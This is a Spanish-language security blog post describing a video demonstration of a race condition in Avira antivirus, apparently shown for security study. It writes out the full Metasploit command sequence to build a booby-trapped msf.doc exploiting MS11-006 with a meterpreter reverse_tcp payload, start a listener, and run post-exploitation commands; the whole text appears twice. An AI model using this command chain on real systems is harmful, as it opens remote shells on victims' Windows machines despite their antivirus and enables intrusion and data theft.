Os dejo un interesante vídeo de Zataz en Securitytube sobre una condición de carrera o race condition en Avira.
Recordamos vía Wikipedia que múltiples procesos están en condición de carrera si el resultado de los mismos depende del orden en que se ejecute. Si los procesos que están en condición de carrera no son correctamente sincronizados, puede producirse un error de corrupción de datos, lo que puede ser aprovechado por exploits locales para vulnerar los sistemas.
En este caso el exploit utilizado en el vídeo se aprovecha de la vulnerabilidad MS11-006 (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) y el payload inyectado es el reverse TCP de meterpreter.
Como podrás comprobar, un antivirus "Avira AntiVir Personal" actualizado detectará el ataque pero tarde, por lo que llegaremos a conseguir la sesión de meterpreter y obtendremos acceso al sistema. Esta condición de carrera parece ser también aplicable a otros productos de Avira como Avira AntiVir Premium y Avira Premium Security Suite.
Los comandos de Metasploit ejecutados son los siguientes:
Para crear el fichero msf.doc para explotar la vulnerabilidad MS11-06:
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
Para escuchar sesiones entrantes de Meterpreter:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j
sysinfo
ipconfig
getpid
ps
Recordamos vía Wikipedia que múltiples procesos están en condición de carrera si el resultado de los mismos depende del orden en que se ejecute. Si los procesos que están en condición de carrera no son correctamente sincronizados, puede producirse un error de corrupción de datos, lo que puede ser aprovechado por exploits locales para vulnerar los sistemas.
En este caso el exploit utilizado en el vídeo se aprovecha de la vulnerabilidad MS11-006 (Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow) y el payload inyectado es el reverse TCP de meterpreter.
Como podrás comprobar, un antivirus "Avira AntiVir Personal" actualizado detectará el ataque pero tarde, por lo que llegaremos a conseguir la sesión de meterpreter y obtendremos acceso al sistema. Esta condición de carrera parece ser también aplicable a otros productos de Avira como Avira AntiVir Premium y Avira Premium Security Suite.
Los comandos de Metasploit ejecutados son los siguientes:
Para crear el fichero msf.doc para explotar la vulnerabilidad MS11-06:
use exploit/windows/fileformat/ms11_006_createsizeddibsection
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
Para escuchar sesiones entrantes de Meterpreter:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
set InitialAutoRunScript migrate -f
exploit -j
sysinfo
ipconfig
getpid
ps
Comentarios
Publicar un comentario